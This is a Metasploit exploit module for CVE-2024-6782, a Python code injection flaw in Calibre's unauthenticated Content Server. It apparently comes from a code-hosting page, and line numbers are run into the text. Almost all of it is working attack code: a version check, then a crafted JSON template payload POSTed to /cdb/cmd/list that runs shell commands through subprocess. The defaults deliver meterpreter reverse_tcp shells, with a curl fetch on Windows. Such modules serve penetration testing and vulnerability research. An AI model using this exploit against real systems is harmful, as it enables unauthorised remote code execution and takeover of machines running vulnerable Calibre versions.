Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/multi/misc/calibre_exec.rb
Views: 11784
class MetasploitModule < Msf::Exploit::Remote1Rank = ExcellentRanking2include Msf::Exploit::Remote::HttpClient3prepend Msf::Exploit::Remote::AutoCheck45def initialize(info = {})6super(7update_info(8info,9'Name' => 'Calibre Python Code Injection (CVE-2024-6782)',10'Description' => %q{11This module exploits a Python code injection vulnerability in the Content Server component of Calibre v6.9.0 - v7.15.0. Once enabled (disabled by default), it will listen in its default configuration on all network interfaces on TCP port 8080 for incoming traffic, and does not require any authentication. The injected payload will get executed in the same context under which Calibre is being executed.12},13'License' => MSF_LICENSE,14'Author' => [15'Amos Ng', # Discovery & PoC16'Michael Heinzl', # MSF exploit17],18'References' => [19[ 'URL', 'https://starlabs.sg/advisories/24/24-6782'],20[ 'CVE', '2024-6782']21],22'DisclosureDate' => '2024-07-31',23'Platform' => ['win', 'linux', 'unix'],24'Arch' => [ ARCH_CMD ],2526'Payload' => {27'BadChars' => '\\'28},2930'Targets' => [31[32'Windows_Fetch',33{34'Arch' => [ ARCH_CMD ],35'Platform' => 'win',36'DefaultOptions' => {37'FETCH_COMMAND' => 'CURL',38'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'39},40'Type' => :win_fetch41}42],43[44'Linux Command',45{46'Platform' => [ 'unix', 'linux' ],47'Arch' => ARCH_CMD,48'Type' => :nix_cmd,49'DefaultOptions' => {50'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'51}52}53],5455],56'DefaultTarget' => 0,5758'Notes' => {59'Stability' => [CRASH_SAFE],60'Reliability' => [REPEATABLE_SESSION],61'SideEffects' => [IOC_IN_LOGS]62}63)64)6566register_options(67[68Opt::RPORT(8080)69]70)71end7273def check74begin75res = send_request_cgi({76'method' => 'GET',77'uri' => normalize_uri(target_uri.path)78})79rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError80return CheckCode::Unknown81end8283if res && res.code == 20084data = res.body.to_s85pattern = /CALIBRE_VERSION\s*=\s*"([^"]+)"/8687version = data.match(pattern)8889if version[1].nil?90return CheckCode::Unknown91else92vprint_status('Version retrieved: ' + version[1].to_s)93end9495if Rex::Version.new(version[1]).between?(Rex::Version.new('6.9.0'), Rex::Version.new('7.15.0'))96return CheckCode::Appears97else98return CheckCode::Safe99end100else101return CheckCode::Unknown102end103end104105def exploit106execute_command(payload.encoded)107end108109def execute_command(cmd)110print_status('Sending payload...')111exec_calibre(cmd)112print_status('Exploit finished, check thy shell.')113end114115def exec_calibre(cmd)116payload = '['\117'["template"], '\118'"", '\119'"", '\120'"", '\121'1,'\122'"python:def evaluate(a, b):\\n '\123'import subprocess\\n '\124'try:\\n '\125"return subprocess.check_output(['cmd.exe', '/c', '#{cmd}']).decode()\\n "\126'except Exception:\\n '\127"return subprocess.check_output(['sh', '-c', '#{cmd}']).decode()\""\128']'129130res = send_request_cgi({131'method' => 'POST',132'ctype' => 'application/json',133'data' => payload,134'uri' => normalize_uri(target_uri.path, 'cdb/cmd/list')135})136137if res && res.code == 200138print_good('Command successfully executed, check your shell.')139elsif res && res.code == 400140fail_with(Failure::UnexpectedReply, 'Server replied with a Bad Request response.')141end142end143144end145146147